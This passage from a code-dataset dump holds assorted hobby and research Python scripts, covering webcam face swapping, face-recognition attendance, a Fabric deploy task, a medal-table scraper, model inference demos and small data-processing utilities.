railroads\n","sub_path":"load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"430645582","text":"\n'''\n\nThis file will contain the OpenCV neccesary to do real-time face swapping. The page\nopens up the camera stream and user access point.\n\n'''\n\nimport numpy as np\nimport cv2\n\nfrom tensorflow.python.keras.models import load_model\n\nfrom PIL import Image\n\nfrom face_detector_utils import *\n\n# Face cascade to detect faces\nface_cascade = cv2.CascadeClassifier('assets/cascades/haarcascade_frontalface_default.xml')\n\n# This function is used to return a face image\ndef get_face_original (frame, spec):\n \n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n # Detect faces\n faces = face_cascade.detectMultiScale(gray, 1.25, 6)\n\n for (x, y, w, h) in faces:\n\n # Grab the face\n gray_face = gray[y:y+h, x:x+w]\n color_face = frame[y:y+h, x:x+w]\n \n if (spec == \"color\"):\n return color_face\n else:\n return gray_face\n\n# This function is used to determine a face based on a cv frame\ndef extract_face (frame):\n\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n # Detect faces\n faces = face_cascade.detectMultiScale(gray, 1.25, 6)\n\n for (x, y, w, h) in faces:\n\n # Grab the face\n gray_face = gray[y:y+h, x:x+w]\n color_face = frame[y:y+h, x:x+w]\n\n # Normalize to match the input format of the model - Range of pixel to [0, 1]\n gray_normalized = gray_face / 255\n\n # Resize it to 96x96 to match the input format of the model\n original_shape = gray_face.shape # A Copy for future reference\n face_resized = cv2.resize(gray_normalized, (96, 96), interpolation = cv2.INTER_AREA)\n face_resized_copy = face_resized.copy()\n face_resized = face_resized.reshape(1, 96, 96, 1)\n\n # Predicting the keypoints using the model\n keypoints = model.predict(face_resized)\n\n # De-Normalize the keypoints values\n keypoints = keypoints * 48 + 48\n\n # Map the Keypoints back to the original image\n face_resized_color = cv2.resize(color_face, (96, 96), interpolation = cv2.INTER_AREA)\n face_resized_color2 = np.copy(face_resized_color)\n\n # Pair them together\n points = []\n for i, co in enumerate(keypoints[0][0::2]):\n points.append((co, keypoints[0][1::2][i]))\n\n # Add KEYPOINTS to the frame2\n for keypoint in points:\n cv2.circle(face_resized_color2, keypoint, 1, (0,255,0), 1)\n\n frame[y:y+h, x:x+w] = cv2.resize(face_resized_color2, original_shape, interpolation = cv2.INTER_CUBIC)\n\n # Show the frame and the overlay (cascade)\n cv2.imshow(\"Facial Keypoints\", frame)\n \n return frame\n\n# This function returns the list of key facial detection key points\ndef extract_facial_features (frame):\n\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n # Detect faces\n faces = face_cascade.detectMultiScale(gray, 1.25, 6)\n\n # 2D list used to store the x and y coordinates of all the facial landmarks (converted to contours later)\n points = []\n\n for (x, y, w, h) in faces:\n\n # Grab the face\n gray_face = gray[y:y+h, x:x+w]\n color_face = frame[y:y+h, x:x+w]\n\n # Normalize to match the input format of the model - Range of pixel to [0, 1]\n gray_normalized = gray_face / 255\n\n # Resize it to 96x96 to match the input format of the model\n original_shape = gray_face.shape # A Copy for future reference\n face_resized = cv2.resize(gray_normalized, (96, 96), interpolation = cv2.INTER_AREA)\n face_resized_copy = face_resized.copy()\n face_resized = face_resized.reshape(1, 96, 96, 1)\n\n # Predicting the keypoints using the model\n keypoints = model.predict(face_resized)\n\n # De-Normalize the keypoints values\n keypoints = keypoints * 48 + 48\n\n # Map the Keypoints back to the original image\n face_resized_color = cv2.resize(color_face, (96, 96), interpolation = cv2.INTER_AREA)\n face_resized_color2 = np.copy(face_resized_color)\n\n # Pair them together\n for i, co in enumerate(keypoints[0][0::2]):\n points.append((co, keypoints[0][1::2][i]))\n\n return points\n\n# The file paths for the CNN custom facial recognition model and source image (layered on top of destination image)\nmodel = load_model('FaceRecognition_CNN.h5')\nsrc_img_path = 'assets/images/al_gore.jpg'\n\n# Read the source image\nsrc_img = cv2.imread(src_img_path)\n\n# Save a copy of the orginal image\nsrc_img_original = get_face_original(src_img, spec=\"color\")\n\n# Resize the source image for mapping\nsrc_img = cv2.resize(src_img_original, (96, 96), interpolation = cv2.INTER_AREA)\n\n# Detect the face from the source image and display it\nsrc_img_detection = extract_face(src_img)\ncv2.waitKey(0)\n\n# Draw the facial contours over the orignal face\nsrc_img_hull = extract_facial_features(src_img)\nsrc_img_hull = np.array(src_img_hull)\nsrc_img_hull = np.asmatrix(src_img_hull)\n\ndraw_convex_hull(src_img, src_img_hull, src_img_original)\ncv2.waitKey(0)\n\n# Start the camera stream for live facial swapping\ncamera = cv2.VideoCapture(0)\n\nwhile True:\n\n # Grab the current paintWindow\n (grabbed, frame) = camera.read()\n frame = cv2.flip(frame, 1)\n\n try:\n\n # Save a copy of the original shape\n frame_original = get_face_original(frame, spec=\"color\")\n\n # Resize the current frame for mapping\n frame = cv2.resize(frame_original, (96, 96), interpolation = cv2.INTER_AREA)\n \n # frame = extract_face(frame)\n frame_hull = extract_facial_features(frame)\n frame_hull = np.array(frame_hull)\n frame_hull = np.asmatrix(frame_hull)\n\n if (len(frame_hull) > 0):\n draw_convex_hull(frame, frame_hull, frame_original)\n print(\"Drawing convex hull...\")\n else:\n print(\"No face detected!\")\n\n except Exception as e:\n print(str(e))\n\n # If the 'q' key is pressed, stop the loop\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\ncamera.release()\ncv2.destroyAllWindows()\n\nprint(\"A wild success!\")","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"604035124","text":"import numpy as np\r\nimport pandas as pd\r\nimport sys\r\nfrom openpyxl import Workbook\r\n\r\nfile_path = 'src/clustered_질문요약_800_n20.xlsx'\r\npath_save = 'src/QueryData/'\r\n\r\ndf = pd.read_excel(file_path)\r\ndata = pd.DataFrame()\r\nannotation_Q = df['질문 요약'].tolist()\r\n# annotation_A = df['답변 요약'].tolist()\r\nIndex = df['Index'].tolist()\r\nlabel = df['labels'].tolist()\r\n\r\ndef write_file(index, path):\r\n f = open(path+str(Index[i])+'QueryData.txt','w')\r\n f.write(annotation_Q[index])\r\n f.close()\r\n print(index)\r\n\r\n\r\nfor i in range(len(annotation_Q)):\r\n write_file(i,path_save+(str(label[i]))+'\\\\')","sub_path":"refining_Data/SetData/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"402244943","text":"\nimport os\n\nfrom fabric.api import cd, run, sudo, local, lcd, env\nfrom fabric.colors import green, red\nfrom fabric.contrib.project import rsync_project\n\nproject_path = \"/go/src/github.com/etowett/gorsch/\"\nlocal_dir = \"{0}{1}\".format(os.getenv(\"HOME\"), project_path)\ninstall_dir = \"/apps/gorsch/\"\nenv.use_ssh_config = True\n\n\ndef dev():\n env.hosts = [\"sms\"]\n\n\ndef xdeploy():\n \"\"\"Locally sync host and server application code.\"\"\"\n with lcd(local_dir):\n local(\"go build -o /tmp/gorsch\")\n rsync_project('/tmp/gorsch', local_dir='/tmp/gorsch')\n local('rm /tmp/gorsch')\n print(red(\"stop gorsch app\"))\n sudo(\"systemctl stop gorsch\")\n with cd(install_dir):\n run('mv /tmp/gorsch .')\n print(green(\"start service\"))\n sudo(\"systemctl restart gorsch\")\n return\n","sub_path":"fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"518504729","text":"from selenium import webdriver\r\nimport pygame\r\n\r\npygame.init()\r\n\r\nSW, SH = 1600, 900\r\n\r\nscreen = pygame.display.set_mode((SW, SH))\r\n\r\nBG = pygame.image.load(\"assets/background.png\") \r\n\r\npygame.display.set_caption(\"Olympics\")\r\npygame.display.set_icon(pygame.image.load(\"assets/icon_image.jpg\"))\r\n\r\nloading_font = pygame.font.Font(\"assets/RobotoCondensed-Bold.ttf\", 65)\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.add_argument(\"headless\")\r\n\r\nurl = \"https://olympics.com/tokyo-2020/olympic-games/en/results/all-sports/medal-standings.htm\"\r\n\r\nbrowser = webdriver.Chrome(chrome_options=options)\r\nbrowser.get(url)\r\n\r\ncountries = {}\r\n\r\nnames = browser.find_elements_by_class_name(\"playerTag\")\r\ndata = browser.find_elements_by_css_selector(\"td\")\r\n\r\nloading = loading_font.render(f\"Loading...\", True, \"white\")\r\n\r\ndef generate_data():\r\n global countries, loading\r\n\r\n for i in range(len(data)):\r\n if data[i].text != \"\":\r\n if data[i].text[0].isalpha():\r\n countries[data[i].text][\"gold\"] = data[i+1].text\r\n countries[data[i].text][\"silver\"] = data[i+2].text\r\n countries[data[i].text][\"bronze\"] = data[i+3].text\r\n loading = loading_font.render(f\"Loading {data[i].text}...\", True, \"white\")\r\n screen.blit(BG, (0, 0))\r\n loading_rect = loading.get_rect(center=(800, 450))\r\n screen.blit(loading, loading_rect)\r\n pygame.display.update()\r\n\r\n return countries\r\n","sub_path":"webscraper.py","file_name":"webscraper.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"160542920","text":"from pathlib import Path\r\nfrom typing import List, Union\r\nfrom tdw.tdw_utils import TDWUtils\r\nfrom tdw.output_data import Images\r\nfrom sticky_mitten_avatar.avatars import Arm\r\nfrom sticky_mitten_avatar import StickyMittenAvatarController\r\nfrom sticky_mitten_avatar.util import get_data\r\n\r\n\r\nclass PutObjectInContainer(StickyMittenAvatarController):\r\n \"\"\"\r\n 1. Create a sticky mitten avatar, a jug, and a container. Add an overhead camera for image capture.\r\n 2. The avatar picks up the jug.\r\n 3. The avatar goes to the container.\r\n 4. The avatar puts the jug in the container.\r\n\r\n Save an image per frame.\r\n \"\"\"\r\n\r\n def __init__(self, output_dir: str, port: int = 1071, launch_build: bool = True):\r\n \"\"\"\r\n :param output_dir: The output directory for images.\r\n :param port: The port number.\r\n :param launch_build: If True, automatically launch the build.\r\n \"\"\"\r\n\r\n self.output_dir = Path(output_dir)\r\n if not self.output_dir.exists():\r\n self.output_dir.mkdir(parents=True)\r\n self.output_dir = str(self.output_dir.resolve())\r\n print(f\"Images will be saved to: {self.output_dir}\")\r\n\r\n super().__init__(port=port, launch_build=launch_build)\r\n\r\n # Save images every frame, if possible.\r\n self.frame_count = 0\r\n self.o_id = 0\r\n self.bowl_id = 1\r\n\r\n def communicate(self, commands: Union[dict, List[dict]]) -> List[bytes]:\r\n resp = super().communicate(commands)\r\n\r\n # Save images per frame.\r\n images = get_data(resp=resp, d_type=Images)\r\n if images is not None:\r\n TDWUtils.save_images(images=images,\r\n filename=TDWUtils.zero_padding(self.frame_count, width=4),\r\n output_directory=self.output_dir)\r\n self.frame_count += 1\r\n return resp\r\n\r\n def _get_scene_init_commands(self, scene: str = None, layout: int = None) -> List[dict]:\r\n commands = super()._get_scene_init_commands()\r\n # Add a jug.\r\n self.o_id, jug_commands = self._add_object(\"jug05\",\r\n position={\"x\": -0.2, \"y\": 0, \"z\": 0.285},\r\n scale={\"x\": 0.8, \"y\": 0.8, \"z\": 0.8})\r\n commands.extend(jug_commands)\r\n # Add a container.\r\n bowl_position = {\"x\": 1.2, \"y\": 0, \"z\": 0.25}\r\n self.bowl_id, bowl_commands = self._add_object(\"serving_bowl\",\r\n position=bowl_position,\r\n rotation={\"x\": 0, \"y\": 30, \"z\": 0},\r\n scale={\"x\": 1.3, \"y\": 1, \"z\": 1.3})\r\n commands.extend(bowl_commands)\r\n return commands\r\n\r\n def run(self) -> None:\r\n \"\"\"\r\n Run a single trial. Save images per frame.\r\n \"\"\"\r\n\r\n self.init_scene()\r\n\r\n # Add a third-person camera.\r\n self.add_overhead_camera({\"x\": -0.08, \"y\": 1.25, \"z\": 1.41}, target_object=\"a\", images=\"cam\")\r\n\r\n # Pick up the object.\r\n self.grasp_object(object_id=self.o_id, arm=Arm.left)\r\n # Lift the object up a bit.\r\n self.reach_for_target(target={\"x\": -0.1, \"y\": 0.6, \"z\": 0.32}, arm=Arm.left)\r\n # Go to the bowl.\r\n self.go_to(target=self.bowl_id, move_stopping_threshold=0.3)\r\n self.turn_to(target=self.bowl_id)\r\n # Lift the object up a bit.\r\n self.reach_for_target(target={\"x\": -0.1, \"y\": 0.6, \"z\": 0.5}, arm=Arm.left)\r\n # Drop the object in the container.\r\n self.drop()\r\n for i in range(50):\r\n self.communicate([])\r\n # Stop the build.\r\n self.end()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n from argparse import ArgumentParser\r\n parser = ArgumentParser()\r\n parser.add_argument(\"--dir\", default=\"images\", type=str, help=\"Output directory for images.\")\r\n args = parser.parse_args()\r\n\r\n PutObjectInContainer(output_dir=args.dir).run()\r\n","sub_path":"controllers/put_object_in_container.py","file_name":"put_object_in_container.py","file_ext":"py","file_size_in_byte":4053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"577546102","text":"# Copyright @ 2019 Alibaba. All rights reserved.\n# Created by ruhuan on 2019.09.09\n\"\"\" python demo usage about MNN API \"\"\"\nfrom __future__ import print_function\nimport numpy as np\nimport MNN\nimport cv2\nimport sys\n\ndef inference():\n \"\"\" inference mobilenet_v1 using a specific picture \"\"\"\n interpreter = MNN.Interpreter(sys.argv[1])\n interpreter.setCacheFile('.tempcache')\n config = {}\n config['precision'] = 'low'\n \n # create session\n runtimeinfo, exists = MNN.Interpreter.createRuntime((config,))\n print(runtimeinfo, exists)\n session = interpreter.createSession(config, runtimeinfo)\n \n # show session info\n print('memory_info: %fMB' % interpreter.getSessionInfo(session, 0))\n print('flops_info: %fM' % interpreter.getSessionInfo(session, 1))\n print('backend_info: %d' % interpreter.getSessionInfo(session, 2))\n \n input_tensor = interpreter.getSessionInput(session)\n interpreter.resizeTensor(input_tensor, (1, 3, 224, 224))\n interpreter.resizeSession(session)\n\n image = cv2.imread(sys.argv[2])\n #cv2 read as bgr format\n image = image[..., ::-1]\n #change to rgb format\n image = cv2.resize(image, (224, 224))\n #resize to mobile_net tensor size\n image = image - (103.94, 116.78, 123.68)\n image = image * (0.017, 0.017, 0.017)\n #preprocess it\n image = image.transpose((2, 0, 1))\n #change numpy data type as np.float32 to match tensor's format\n image = image.astype(np.float32)\n #cv2 read shape is NHWC, Tensor's need is NCHW,transpose it\n tmp_input = MNN.Tensor((1, 3, 224, 224), MNN.Halide_Type_Float,\\\n image, MNN.Tensor_DimensionType_Caffe)\n input_tensor.copyFrom(tmp_input)\n interpreter.runSession(session)\n output_tensor = interpreter.getSessionOutput(session)\n #constuct a tmp tensor and copy/convert in case output_tensor is nc4hw4\n tmp_output = MNN.Tensor((1, 1001), MNN.Halide_Type_Float, np.ones([1, 1001]).astype(np.float32), MNN.Tensor_DimensionType_Caffe)\n output_tensor.copyToHostTensor(tmp_output) \n print(\"expect 983\")\n print(\"output belong to class: {}\".format(np.argmax(tmp_output.getData())))\n\nif __name__ == \"__main__\":\n inference()\n","sub_path":"pymnn/examples/MNNEngineDemo/mobilenet_demo_2.py","file_name":"mobilenet_demo_2.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"273803194","text":"from Bio.Blast import NCBIXML\r\nfrom Bio import SearchIO\r\nimport os\r\norigin = '\\Python33'\r\npath = os.path.join(origin, \"sdsc_rehs_2013\", 'blast_results')\r\nblastpath = os.path.join (path, \"10254.xml\")\r\nblastq_results = SearchIO.parse(blastpath, \"blast-xml\")\r\nblast_results = NCBIXML.parse(open(blastpath))\r\nfor blastq_result in blastq_results:\r\n print (vars(blastq_result))\r\n","sub_path":"biopython_scripts/old code/blast_dictionary.py","file_name":"blast_dictionary.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"490956799","text":"import re\n\ntry:\n with open('test_schedule.inc',\"r\",encoding = 'utf-8') as file:\n test_file = file.read()\nexcept FileNotFoundError:\n print('Файл не найден')\n \nprint(test_file)\nprint(\"=======================\")\n\ndef clean_schedule(file):\n del_comment = list(map((lambda x: re.sub(r'--[\\w\\s,()]+','',x)),file.split('\\n')))\n return '\\n'.join(list(filter(lambda x: x, del_comment)))\n\nwihout_comment = clean_schedule(test_file)\n","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"243463902","text":"\npositive = open('wordlist/list of positive words.txt', 'r')\nnegative = open(r'wordlist/list of negative words.txt', 'r')\n\np = positive.read().split(',')\nfor i in range(len(p)):\n if p[i][0] == ' ':\n p[i] = p[i][1:]\npositive2 = open('wordlist/positivewords.txt', 'w', encoding='utf-8')\n[positive2.write(word + '\\n') for word in p]\n\nn = negative.read().split(',')\nfor i in range(len(n)):\n if n[i][0] == ' ':\n n[i] = n[i][1:]\nnegative2 = open('wordlist/negativewords.txt', 'w', encoding='utf-8')\n[negative2.write(word + '\\n') for word in n]\n\nprint(p)\n\npositive.close()\npositive2.close()\nnegative.close()\nnegative2.close()\n","sub_path":"Algo Project/wordlistinlines.py","file_name":"wordlistinlines.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"39476699","text":"#!/usr/bin/env python\nimport fileinput\n\ndef plan(line):\n base = ord('A')\n parties = line.split(\" \")\n parties = [int(p) for p in parties]\n output = \"\"\n while not all(p == 0 for p in parties):\n # find the max value\n maxval = max(parties)\n maxParties = [i for i, j in enumerate(parties) if j == maxval]\n if len(maxParties) % 2 == 0:\n # remove two\n parties[maxParties[0]] -= 1\n parties[maxParties[1]] -= 1\n output += chr(base + maxParties[0])\n output += chr(base + maxParties[1])\n else:\n # remove one\n parties[maxParties[0]] -= 1\n output += chr(base + maxParties[0])\n output += \" \"\n return output.strip()\n\ni = 0\nfor line in fileinput.input():\n if i == 0:\n i += 1\n continue\n if i % 2 == 0:\n line = line[0:-1]\n print(\"Case #\" + str(i/2) + \": \" + str(plan(line)))\n i += 1\n","sub_path":"solutions_5753053697277952_0/Python/technicalguy/evacuation.py","file_name":"evacuation.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"651483537","text":"# -*- coding: utf8 -*-\n\"\"\"\nZigZag Level Order Traversal BT\n===============================\n\nGiven a binary tree, return the zigzag level order traversal of its nodes’ values. (ie, from left to right, then right to left for the next level and alternate between).\n\nExample: \nGiven binary tree\n\n 3\n / \\\n 9 20\n / \\\n 15 7\nreturn\n\n[\n [3],\n [20, 9],\n [15, 7]\n]\n\"\"\"\n\nfrom __future__ import print_function\n\n\nclass Node:\n def __init__(self, data, left=None, right=None):\n self.data = data\n self.left = left\n self.right = right\n\n\ndef zigzag(node):\n if node is None:\n return\n\n s1 = [node]\n s2 = []\n reverse = False\n\n while True:\n n = s1.pop()\n yield n.data\n children = [n.left, n.right]\n if reverse:\n children.reverse()\n for ch in children:\n if ch is not None:\n s2.append(ch)\n if not s1:\n if not s2:\n break\n s1 = s2\n s2 = []\n reverse = not reverse\n\n\n# perfect binary search tree of height 3.\ntree = Node(8, Node(4, Node(2, Node(1), Node(3)), Node(6, Node(5), Node(7))),\n Node(12, Node(10, Node(9), Node(11)), Node(14, Node(13), Node(15))))\nprint(list(zigzag(tree)))\n","sub_path":"InterviewBit/TreeDataStructure/ZigZagLevelOrderTraversalBT.py","file_name":"ZigZagLevelOrderTraversalBT.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"315871364","text":"import os\r\nimport face_recognition\r\nimport cv2\r\nfrom Data import *\r\nfrom PIL import Image\r\nimport numpy as np\r\n\r\n\r\ndef encode_and_store_values(division='SE CMPN A'):\r\n images = os.listdir('Student Images/' + division + \"/\")\r\n\r\n # Opening the text files in w+ mode, so entire text file will be rewritten and if it doesnt exist\r\n # then a new file will be created\r\n input_encoding_file = open('Student Images/' + division + '/' + '#Encodings.txt', 'w+')\r\n input_ids = open('Student Images/' + division + '/' + '#Encoding Id.txt', 'w+')\r\n\r\n # Iterating through the database and writing encoding and id to text files\r\n # images[2:] because the first two files in each folder are the #Encodings.txt & #Encoding Id.txt which we skip\r\n for image in images[2:]:\r\n\r\n ''' \r\n # This block is if we want to store encoding of grayscale images\r\n img_gray = img_new.convert('L')\r\n print(\"Grayscale image created\")\r\n img_gray.save('Gray_Temp.jpg')\r\n current_image = face_recognition.load_image_file('Gray_Temp.jpg')\r\n print(img_gray.mode)\r\n '''\r\n\r\n current_image = face_recognition.load_image_file(\"Student Images/\" + division + \"/\" + image)\r\n current_image_encoded = face_recognition.face_encodings(current_image, None, 15)[0]\r\n # known_face_encodings.append(current_image_encoded)\r\n # known_face_ids.append(image.split('.')[0]) # Adding Roll Numbers to the list\r\n print(image + \" scanned\")\r\n print(image.split('.')[0])\r\n print(current_image_encoded)\r\n\r\n # Converting current encoding to str and separating each element by ' ' and no [] or \\n will be written\r\n input_encoding_file.write(' '.join(map(str, current_image_encoded)))\r\n # After each encoding vector written add a ',' so that we can ez split it later\r\n input_encoding_file.write(',')\r\n # add the roll number to the input_ids text file and add \\n, for splitlines() later\r\n input_ids.write(image.split('.')[0]+'\\n')\r\n input_encoding_file.close()\r\n input_ids.close()\r\n\r\n\r\ndef face_detect_and_recognize(image_paths, lecture_details):\r\n\r\n # Path for folder of known images\r\n images = os.listdir('Student Images/' + lecture_details['year_branch_div'] + \"/\")\r\n\r\n # Converting image to grayscale (works now :D)\r\n '''\r\n img_new = Image.open(img)\r\n img_gray = img_new.convert('L')\r\n print(\"Grayscale image created\")\r\n img_gray.save('GrayOut.jpg')\r\n img_gray.show()\r\n print(img_gray.mode)\r\n '''\r\n\r\n # Old filthy way to encode images\r\n # Fill known face encodings and their names in respective lists\r\n '''\r\n for image in images:\r\n current_image = face_recognition.load_image_file(\"Student Images/\"+division+\"/\" + image)\r\n current_image_encoded = face_recognition.face_encodings(current_image, None, 15)[0]\r\n known_face_encodings.append(current_image_encoded)\r\n known_face_id.append(image.split('.')[0]) # Adding Roll Numbers to the list\r\n print(image + \" scanned\")\r\n print(current_image_encoded)\r\n '''\r\n\r\n # New and improved way to read encodings\r\n # Reading from encoding and adding it to known_encodings\r\n\r\n # Initializing lists\r\n known_face_encodings = []\r\n current_encoding = []\r\n known_face_ids = []\r\n matched_ids = []\r\n image_counter = 1\r\n\r\n input_encoding_file = open('Student Images/' + lecture_details['year_branch_div'] + '/' + '#Encodings.txt', 'r')\r\n input_ids = open('Student Images/' + lecture_details['year_branch_div'] + '/' + '#Encoding Id.txt', 'r')\r\n\r\n # Encodings.txt contains the encoding vectors for each image in the database\r\n # Each vector is ended by a ',' which is why we used that split\r\n # Encoding Id.txt contains the roll numbers of the images, one on each line, hence splitlines()\r\n\r\n for encoding, current_id in zip(input_encoding_file.read().split(','), input_ids.read().splitlines()):\r\n # you need to split the current vector into individual elements to be able to add them to the list\r\n # which is why encoding.split() exists\r\n for encoding_value in encoding.split():\r\n current_encoding.append(encoding_value)\r\n print(current_id)\r\n known_face_ids.append(current_id)\r\n\r\n # The PIECE DE RESISTANCE\r\n # Converting the current_encoding list into an np array with each element in it of dtype float64\r\n current_encoding = np.array(current_encoding, dtype='float64')\r\n # print(current_encoding.shape, 'dype: ', current_encoding.dtype)\r\n known_face_encodings.append(current_encoding)\r\n # Resetting the value of the current_encoding to use for the next encoding vector\r\n current_encoding = []\r\n\r\n print(\"Finished compiling database\")\r\n\r\n input_encoding_file.close()\r\n input_ids.close()\r\n\r\n # Perform encoding for each image to check using image_paths which is a list of path of images provided\r\n for img_path in image_paths:\r\n img = Image.open(img_path)\r\n print(\"Image opened\")\r\n img.save('New Image.jpg')\r\n print(\"Image saved\")\r\n image_to_scan = face_recognition.load_image_file('New Image.jpg')\r\n print(\"Imaged loaded\")\r\n\r\n '''\r\n # Converting to grayscale block\r\n img = Image.open(img_path)\r\n print(\"Image opened\")\r\n img_gray = img.convert('L')\r\n img_gray.save('GrayOut.jpg')\r\n print(\"Image saved\")\r\n image_to_scan = face_recognition.load_image_file('GrayOut.jpg')\r\n print(\"Imaged loaded\")\r\n '''\r\n\r\n face_locations = face_recognition.face_locations(image_to_scan)\r\n print(\"Face locations found\")\r\n face_encodings = face_recognition.face_encodings(image_to_scan, face_locations, 15)\r\n print(\"Current image encoded\")\r\n\r\n for (top, right, bottom, left), face_encoding in zip(face_locations, face_encodings):\r\n # See if the face is a match for the known face(s)\r\n matches = face_recognition.compare_faces(known_face_encodings, face_encoding, 0.45)\r\n # 0.48 best, 0.47 more accurate, 0.5 gets results atleast\r\n print(matches)\r\n name = \"Unknown\"\r\n roll_number = \"Unknown\"\r\n # If a match was found in known_face_encodings, just use the first one.\r\n if True in matches:\r\n first_match_index = matches.index(True)\r\n roll_number = known_face_ids[first_match_index]\r\n name = get_name(roll_number)\r\n print(name)\r\n matched_ids.append(roll_number)\r\n\r\n # Draw rectangle on OG image and not grayscale\r\n # Draw a box around the face\r\n cv2.rectangle(image_to_scan, (left, top), (right + 10, bottom), (0, 0, 255), 2)\r\n\r\n # Draw a label with a name below the face\r\n font = cv2.FONT_HERSHEY_DUPLEX\r\n cv2.putText(image_to_scan, name, (left + 6, bottom - 6), font, 0.8, (255, 255, 255), 1)\r\n\r\n print(\"Recognised all faces\")\r\n\r\n # Convert BGR to RGB\r\n image_to_scan = image_to_scan[:, :, ::-1]\r\n\r\n print(\"About to display\")\r\n\r\n '''\r\n # Resizing the image so that it matches the dimensions of the cv2.imshow() output window\r\n small_image = cv2.resize(image_to_scan, (800, 600))\r\n\r\n # Display image on output screen and save scanned image as Output.jpg\r\n while True:\r\n cv2.imshow('Output', small_image)\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n '''\r\n\r\n # Save output of current image to subject directory of class as\r\n # current_date + lecture_time + lecture_type + 1,2,3... .jpg\r\n\r\n path = 'Output Images/' + lecture_details['year_branch_div'] + '/' + lecture_details['subject'] + '/'\r\n if 'time' in lecture_details.keys():\r\n # Replacing : by . because file names cannot have :, but lecture_time has : in it so yeah\r\n lecture_details['time'] = lecture_details['time'].replace(':', '.')\r\n img_name = lecture_details['date'] + ' ' + lecture_details['time'] + ' ' + lecture_details['type'] + ' ' + str(image_counter) + '.jpg'\r\n else:\r\n img_name = lecture_details['date'] + ' ' + lecture_details['type'] + ' ' + str(image_counter) + '.jpg'\r\n print(path + img_name)\r\n # Only save image if a face was detected\r\n if len(matched_ids) > 0 :\r\n cv2.imwrite(path + img_name, image_to_scan)\r\n print(\"Image saved\")\r\n # Saving temporary output so we can use startfile with it\r\n cv2.imwrite('Output.jpg', image_to_scan)\r\n # Display image\r\n os.startfile('Output.jpg')\r\n image_counter += 1\r\n\r\n return matched_ids\r\n\r\n\r\n# face_detect_and_recognize(['New Image.jpg'])\r\n\r\n\r\n# RUN THIS FUCKING FUNCTION ONCE\r\n# THEN COMMENT IT OUT AND EVERYTHING SHOULD WORK FINE\r\n# encode_and_store_values()\r\n","sub_path":"FaceRecognition.py","file_name":"FaceRecognition.py","file_ext":"py","file_size_in_byte":8979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"312262813","text":"import torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\n\r\n\r\nclass Generator(nn.Module):\r\n def __init__(self, ngf=None, ngh=None, opts=None):\r\n super(Generator, self).__init__()\r\n # 1 x T x 257\r\n self.conv1 = nn.Sequential(\r\n nn.ReplicationPad2d((0, 0, 1, 0)),\r\n nn.Conv2d(1, 16, (2, 3), (1, 2)),\r\n nn.BatchNorm2d(16),\r\n nn.ELU(),\r\n )\r\n # 16 x T x 128\r\n self.conv2 = nn.Sequential(\r\n nn.ReplicationPad2d((0, 0, 1, 0)),\r\n nn.Conv2d(16, 32, (2, 3), (1, 2)),\r\n nn.BatchNorm2d(32),\r\n nn.ELU(),\r\n )\r\n # 32 x T x 63\r\n self.conv3 = nn.Sequential(\r\n nn.ReplicationPad2d((0, 0, 1, 0)),\r\n nn.Conv2d(32, 64, (2, 3), (1, 2)),\r\n nn.BatchNorm2d(64),\r\n nn.ELU(),\r\n )\r\n # 64 x T x 31\r\n self.conv4 = nn.Sequential(\r\n nn.ReplicationPad2d((0, 0, 1, 0)),\r\n nn.Conv2d(64, 128, (2, 3), (1, 2)),\r\n nn.BatchNorm2d(128),\r\n nn.ELU(),\r\n )\r\n # 128 x T x 15\r\n self.conv5 = nn.Sequential(\r\n nn.ReplicationPad2d((0, 0, 1, 0)),\r\n nn.Conv2d(128, 256, (2, 3), (1, 2)),\r\n nn.BatchNorm2d(256),\r\n nn.ELU(),\r\n )\r\n # 256 x T x 7\r\n # T x 1024\r\n self.lstm = nn.LSTM(7*256, 1024, 2, batch_first=True, bidirectional=False)\r\n self.fc = nn.Sequential(\r\n nn.Linear(1024, 7*256),\r\n nn.BatchNorm1d(7*256),\r\n nn.ELU()\r\n )\r\n # T x 1024\r\n # 256 x T x 4\r\n self.deconv5 = nn.Sequential(\r\n nn.ConvTranspose2d(256*2, 128, (2, 